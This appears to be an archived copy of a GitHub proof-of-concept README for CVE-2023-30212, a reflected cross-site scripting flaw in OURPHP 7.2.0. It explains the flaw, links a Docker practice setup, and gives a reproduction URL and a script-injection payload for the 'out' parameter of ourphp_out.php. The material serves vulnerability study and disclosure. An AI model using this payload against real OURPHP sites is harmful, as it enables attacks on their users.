Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-30212 PoC — OURPHP 跨站脚本漏洞

Source
https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE
Associated Vulnerability
Title:OURPHP 跨站脚本漏洞 (CVE-2023-30212)
Description:OURPHP是OURPHP开源的一个开源、跨平台、企业级+电商+小程序+APP多终端同步的CMS建站系统。 OURPHP 7.2.0版本及之前版本存在安全漏洞,该漏洞源于通过文件ourphp_out.php发现包含跨站脚本(XSS)漏洞。
Description
This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.
Readme
# CVE-2023-30212 POC : Cross-Site Scripting
#### via /client/manage/ourphp_out.php

## Products Affected By CVE-2023-30212 :

| Vendor          | Product         | Version |
|:--------:       |:--------:       |:--------:|
| ourphp          | ourphp          |  7.2.0   |

## Docker Installation Guide :

To install OURPHP <= 7.2.0 in docker you can use [guide ](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE/blob/main/Docker%20Setup%20for%20vulnerability%20CVE-2023-30212%20.pdf) to install docker for practice purpose.


## Explaination of Vulnerability:
```go
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"
```
## Steps to Reproduce the issue:
```go
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
```
## Payload for the Vulnerability:
```go
# </script><script>alert(`xss`)</script>
```
## Video
[![CVE-2023-30212](https://i.postimg.cc/sX95Ghkw/Screenshot-2023-05-25-231747.png)](https://vimeo.com/830293942?share=copy)


## References

1. [NIST](https://nvd.nist.gov/vuln/detail/CVE-2023-30212)
2. [cve.mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30212)
3. [Ourphp =>7.2.0 --> Code for reference](https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/)
File Snapshot

 [4.0K]  /data/pocs/0ebc3c10f0956d34945f57f6ddc9584860c4e69c
├── [ 83K]  Docker Setup for vulnerability CVE-2023-30212 .pdf
└── [1.8K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.